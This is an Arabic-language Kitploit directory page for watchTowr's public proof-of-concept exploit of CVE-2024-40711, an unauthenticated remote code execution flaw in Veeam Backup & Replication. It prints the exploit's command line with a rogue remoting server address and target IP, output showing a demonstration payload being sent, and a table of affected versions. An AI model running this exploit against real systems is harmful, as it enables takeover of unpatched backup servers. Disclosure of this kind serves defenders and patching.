Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/watchtowrlabs/cve-2024-40711
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubwatchtowrlabs/cve-2024-40711

CVE-2024-40711

استغلال قبل المصادقة لـ CVE-2024-40711

عرض المستودع
5518منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-40711

استغلال لثغرة إلغاء التسلسل قبل المصادقة في Veeam Backup and Replication CVE-2024-40711

انظر منشور مدونتنا للحصول على التفاصيل الفنية

https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70

PoC قيد التنفيذ

root@kitploit:~
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!

Florian Hauser

تم اكتشاف هذه الثغرة بواسطة Florian Hauser (@frycos) من CODE WHITE GmbH (@codewhitesec). تأكد من متابعة أبحاثه المتميزة؛ كان دورنا فقط إعادة إنشاء هذا الاستغلال وتطويره لهذه المشكلة.

الإصدارات المتأثرة

الإصدارالحالة
12.2.0.334تم إصلاحه بالكامل. غير متأثر بالثغرات الواردة في هذا المنشور.
12.1.2.172متأثر، لكن الاستغلال يتطلب مصادقة. يمكن للمستخدمين منخفضي الامتياز تنفيذ تعليمات برمجية عشوائية.
12.1.1.56 والإصدارات الأقدمعرضة لتنفيذ التعليمات البرمجية عن بُعد بدون مصادقة.

مؤلفو الاستغلال

تم كتابة هذا الاستغلال بواسطة Sina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber)

نود أيضًا أن ننتهز هذه الفرصة لنشكر Soroush Dalili على مساعدته في هذا الاستغلال.

تابع مختبرات watchTowr

لأحدث الأبحاث الأمنية تابع فريق مختبرات watchTowr

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
  • https://github.com/codewhitesec/RogueRemotingServer
  • https://github.com/tyranid/ExploitRemotingService
  • https://www.veeam.com/kb4649
تنزيل الأداة